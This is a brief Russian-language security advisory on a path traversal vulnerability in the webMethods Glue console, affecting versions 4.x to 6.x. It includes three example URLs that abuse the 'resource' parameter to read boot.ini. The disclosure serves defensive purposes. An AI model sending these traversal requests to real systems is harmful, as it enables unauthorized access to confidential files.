Программа:
webMethods Glue 4.x
webMethods Glue 5.x
webMethods Glue 6.x
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в параметре "resource" через /console URL перед отображением файлов. Атакующий может просмотреть произвольные файлы целевой системе.
Примеры:
http://glueconsole:8080/console?resource=../../../boot.ini
http://glueconsole:8080/console?resource=\boot.ini
http://glueconsole:8080/console?resource=c:\boot.ini